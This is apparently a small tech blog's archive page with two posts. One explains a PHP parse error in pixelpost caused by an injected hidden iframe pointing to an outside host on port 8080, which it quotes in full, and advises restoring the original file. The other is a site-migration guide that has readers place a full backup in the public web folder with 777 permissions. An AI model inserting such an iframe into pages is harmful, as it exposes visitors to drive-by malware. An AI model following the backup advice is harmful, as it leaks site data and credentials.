Real Global Solutions

Where knowledge you can get ?

Archive for the ‘Step 1’ tag

Parse error: syntax error, unexpected T_STRING, expecting ‘,’ or ‘;’ in - pixelpost.org

without comments

Parse error: syntax error, unexpected T_STRING, expecting ‘,’ or ‘;’ in - pixelpost.org

So easy setle this problem…

step 1

open error file example index.php on line 295

——————–

<iframe src=”http://39j.ru:8080/index.php” width=193 height=109 style=”visibility: hidden”></iframe>

——————–

Step 2

Download origonal script then open same file… after that replace that file.

done…

any questions… leave you comment.. hehe

Written by admin

August 13th, 2009 at 11:11 pm

How Moving site with full backup With SSH or Shell Access

without comments

How Moving site with full backup With SSH or Shell Access :-

Step 1: ( Old Hosting Provider )

Request from your hosting provider full backup

or

Go cpanel -> Backups -> Generate full backup

after finish move your full backup to public_html and change permission to 777

save your link example:

http://www.yourdomain.com/your-backup-files.tar.gz

Step 2: ( New Hosting Provider )

make sure you have Ssh/Shell Access if not reqiest from your hosting provider.

login to Ssh/Shell Access

fill up:

cd /home ( click enter )

wget http://www.yourdomain.com/your-backup-files.tar.gz ( click enter )

done.  After finish.. do step 3

Step 3:

login to your WHM ( Only Hosting Provider have access for WHM cPanel not Reseller Hosting or Clients )

Backup -> Restore a Full Backup/cpmove file

Enter the username for the account you wish to restore: ( your current username )

click “restore”

done,  good luck ;)